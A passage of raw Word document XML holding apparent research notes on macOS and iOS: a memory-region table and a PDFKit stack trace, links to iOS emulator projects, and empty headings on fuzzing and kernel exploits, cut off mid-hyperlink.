    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>Kernel Alloc Once                     4K</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>MALLOC                             18.3M        see MALLOC ZONE table below</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>MALLOC (admin)                       44K</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>STACK GUARD                           8K</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>Stack                              64.6M</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>VM_ALLOCATE                          28K</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                             15.4M</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__LINKEDIT                         70.2M</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                             76.2M</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__UNICODE                           544K</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>shared memory                         4K</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>===========                      =======</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>TOTAL                             249.2M</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t xml:space="preserve">                                 VIRTUAL ALLOCATION      BYTES</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>MALLOC ZONE                         SIZE      COUNT  ALLOCATED  % FULL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>===========                      =======  =========  =========  ======</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>DefaultMallocZone_0x1081f6000      18.0M       1999       399K      2%</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>GFXMallocZone_0x1083c8000             0K          0         0K</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>===========                      =======  =========  =========  ======</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>TOTAL                              18.0M       1999       399K      2%</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="182" w:name="_Toc411512333"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Process</w:t>
      </w:r>
      <w:bookmarkEnd w:id="182"/>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRDefault="00DF20A6" w:rsidP="00DF20A6">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="183" w:name="_Toc411512334"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">2.1.4.1. </w:t>
      </w:r>
      <w:r w:rsidR="0001799D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>procexp</w:t>
      </w:r>
      <w:bookmarkEnd w:id="183"/>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRDefault="0001799D" w:rsidP="0001799D"/>
    <w:p w:rsidR="0001799D" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="184" w:name="_Toc411512335"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>File</w:t>
      </w:r>
      <w:bookmarkEnd w:id="184"/>
    </w:p>
    <w:p w:rsidR="002151C5" w:rsidRDefault="002151C5" w:rsidP="002151C5"/>
    <w:p w:rsidR="00E80426" w:rsidRDefault="00E80426" w:rsidP="002151C5"/>
    <w:p w:rsidR="00E80426" w:rsidRDefault="00E80426" w:rsidP="00E80426">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>PDFKit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E80426" w:rsidRDefault="00E80426" w:rsidP="00E80426">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Overview</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E80426" w:rsidRPr="00E80426" w:rsidRDefault="00E80426" w:rsidP="00E80426">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E80426">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">0   libdispatch.dylib             </w:t>
      </w:r>
      <w:r w:rsidRPr="00E80426">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>0x00007fff88b88bbf dispatch_semaphore_wait + 7</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E80426" w:rsidRPr="00E80426" w:rsidRDefault="00E80426" w:rsidP="00E80426">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E80426">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">1   com.apple.PDFKit              </w:t>
      </w:r>
      <w:r w:rsidRPr="00E80426">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>0x00007fff98257709 __92-[PDFPageTiledImage fetchTileForCoordinate:shouldGenerateTile:tileCreationCallback:tileOut:]_block_invoke + 60</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E80426" w:rsidRPr="00E80426" w:rsidRDefault="00E80426" w:rsidP="00E80426">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E80426">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">2   com.apple.PDFKit              </w:t>
      </w:r>
      <w:r w:rsidRPr="00E80426">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>0x00007fff9825608d __66+[PDFPageTiledImage addBlockToLIFOTileCreationQueue:waitForBlock:]_block_invoke_2 + 11</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E80426" w:rsidRPr="00E80426" w:rsidRDefault="00E80426" w:rsidP="00E80426">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E80426">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">3   com.apple.Foundation          </w:t>
      </w:r>
      <w:r w:rsidRPr="00E80426">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>0x00007fff9becc8d7 __NSBLOCKOPERATION_IS_CALLING_OUT_TO_A_BLOCK__ + 7</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E80426" w:rsidRPr="00E80426" w:rsidRDefault="00E80426" w:rsidP="00E80426">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E80426">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">4   com.apple.Foundation          </w:t>
      </w:r>
      <w:r w:rsidRPr="00E80426">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>0x00007fff9becc595 -[NSBlockOperation main] + 100</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E80426" w:rsidRPr="00E80426" w:rsidRDefault="00E80426" w:rsidP="00E80426">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E80426">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">5   com.apple.Foundation          </w:t>
      </w:r>
      <w:r w:rsidRPr="00E80426">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>0x00007fff9becac7a -[__NSOperationInternal _start:] + 654</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E80426" w:rsidRPr="00E80426" w:rsidRDefault="00E80426" w:rsidP="00E80426">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E80426">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">6   com.apple.Foundation          </w:t>
      </w:r>
      <w:r w:rsidRPr="00E80426">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>0x00007fff9bec6c64 __NSOQSchedule_f + 194</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E80426" w:rsidRPr="00E80426" w:rsidRDefault="00E80426" w:rsidP="00E80426">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E80426">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">7   libdispatch.dylib             </w:t>
      </w:r>
      <w:r w:rsidRPr="00E80426">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>0x00007fff88b7d40b _dispatch_client_callout + 8</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E80426" w:rsidRPr="00E80426" w:rsidRDefault="00E80426" w:rsidP="00E80426">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E80426">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">8   libdispatch.dylib             </w:t>
      </w:r>
      <w:r w:rsidRPr="00E80426">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>0x00007fff88b8203b _dispatch_queue_drain + 754</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E80426" w:rsidRPr="00E80426" w:rsidRDefault="00E80426" w:rsidP="00E80426">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E80426">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">9   libdispatch.dylib             </w:t>
      </w:r>
      <w:r w:rsidRPr="00E80426">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>0x00007fff88b88707 _dispatch_queue_invoke + 549</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E80426" w:rsidRPr="00E80426" w:rsidRDefault="00E80426" w:rsidP="00E80426">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E80426">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">10  libdispatch.dylib             </w:t>
      </w:r>
      <w:r w:rsidRPr="00E80426">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>0x00007fff88b80d53 _dispatch_root_queue_drain + 538</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E80426" w:rsidRPr="00E80426" w:rsidRDefault="00E80426" w:rsidP="00E80426">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E80426">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">11  libdispatch.dylib             </w:t>
      </w:r>
      <w:r w:rsidRPr="00E80426">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>0x00007fff88b80b00 _dispatch_worker_thread3 + 91</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E80426" w:rsidRPr="00E80426" w:rsidRDefault="00E80426" w:rsidP="00E80426">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E80426">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">12  libsystem_pthread.dylib       </w:t>
      </w:r>
      <w:r w:rsidRPr="00E80426">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>0x00007fff95c9d4de _pthread_wqthread + 1129</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E80426" w:rsidRPr="00E80426" w:rsidRDefault="00E80426" w:rsidP="00E80426">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E80426">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">13  libsystem_pthread.dylib       </w:t>
      </w:r>
      <w:r w:rsidRPr="00E80426">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>0x00007fff95c9b341 start_wqthread + 13</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E80426" w:rsidRDefault="00BD1599" w:rsidP="00E80426">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Apple sdk</w:t>
      </w:r>
      <w:r w:rsidR="00E80426">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E80426" w:rsidRDefault="004106D2" w:rsidP="002151C5">
      <w:hyperlink r:id="rId125" w:anchor="//apple_ref/doc/uid/TP40001863" w:history="1">
        <w:r w:rsidR="00BD1599" w:rsidRPr="00866730">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://developer.apple.com/library/mac/documentation/GraphicsImaging/Conceptual/PDFKitGuide/PDFKit_Prog_Intro/PDFKit_Prog_Intro.html#//apple_ref/doc/uid/TP40001863</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00BD1599" w:rsidRDefault="00BD1599" w:rsidP="002151C5"/>
    <w:p w:rsidR="00D90285" w:rsidRDefault="00D90285" w:rsidP="00D90285">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Ios emulator</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D90285" w:rsidRDefault="00D90285" w:rsidP="00D90285">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Application emulator</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D90285" w:rsidRDefault="00D90285" w:rsidP="00D90285">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Nds4ios </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D90285" w:rsidRDefault="00AD5F0B" w:rsidP="00D90285">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r>
        <w:t>mulate old ios for applicaiton</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D90285" w:rsidRDefault="00D90285" w:rsidP="00D90285">
      <w:r>
        <w:t>N</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ds4ios</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D90285" w:rsidRDefault="004106D2" w:rsidP="00D90285">
      <w:hyperlink r:id="rId126" w:history="1">
        <w:r w:rsidR="00D90285" w:rsidRPr="00CC041C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/raaxis/nds4ios</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00D90285" w:rsidRDefault="00D90285" w:rsidP="00D90285"/>
    <w:p w:rsidR="00D90285" w:rsidRDefault="00D90285" w:rsidP="00D90285">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Full system emulator</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002151C5" w:rsidRDefault="00827B0A" w:rsidP="002151C5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Qemu</w:t>
      </w:r>
      <w:r w:rsidR="00B172D4">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>ios</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002151C5" w:rsidRDefault="004106D2" w:rsidP="002151C5">
      <w:hyperlink r:id="rId127" w:history="1">
        <w:r w:rsidR="006C715A" w:rsidRPr="00CC041C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/nvsio/qemu-ios</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="006C715A" w:rsidRDefault="006C715A" w:rsidP="006C715A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Ios sandbox</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C715A" w:rsidRDefault="006C715A" w:rsidP="002151C5"/>
    <w:p w:rsidR="006B36DE" w:rsidRDefault="004106D2" w:rsidP="006B36DE">
      <w:hyperlink r:id="rId128" w:history="1">
        <w:r w:rsidR="006C715A" w:rsidRPr="00CC041C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/pi-chan/ios-sandbox</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="006C715A" w:rsidRDefault="004106D2" w:rsidP="006B36DE">
      <w:hyperlink r:id="rId129" w:history="1">
        <w:r w:rsidR="006C715A" w:rsidRPr="00CC041C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://xoyip.hatenablog.com/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="006C715A" w:rsidRDefault="006C715A" w:rsidP="006B36DE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3020ABFE" wp14:editId="528C4E99">
            <wp:extent cx="5121084" cy="573835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1084" cy="5738357"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E7B51" w:rsidRDefault="002E7B51" w:rsidP="006B36DE"/>
    <w:p w:rsidR="002E7B51" w:rsidRDefault="002E7B51" w:rsidP="006B36DE"/>
    <w:p w:rsidR="002E7B51" w:rsidRDefault="002E7B51" w:rsidP="006B36DE"/>
    <w:p w:rsidR="002E7B51" w:rsidRDefault="002E7B51" w:rsidP="002E7B51">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Fuzzing</w:t>
      </w:r>
      <w:r w:rsidR="00C0581A">
        <w:t xml:space="preserve"> methods</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B74CA7" w:rsidRPr="00B74CA7" w:rsidRDefault="00B74CA7" w:rsidP="00B74CA7"/>
    <w:p w:rsidR="00B74CA7" w:rsidRDefault="00B74CA7" w:rsidP="00B74CA7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Kernel exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B74CA7" w:rsidRDefault="00B74CA7" w:rsidP="00B74CA7"/>
    <w:p w:rsidR="00B74CA7" w:rsidRDefault="004106D2" w:rsidP="00B74CA7">
      <w:hyperlink r:id="rId131" w:history="1">
        <w:r w:rsidR="00B74CA7" w:rsidRPr="0092264A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
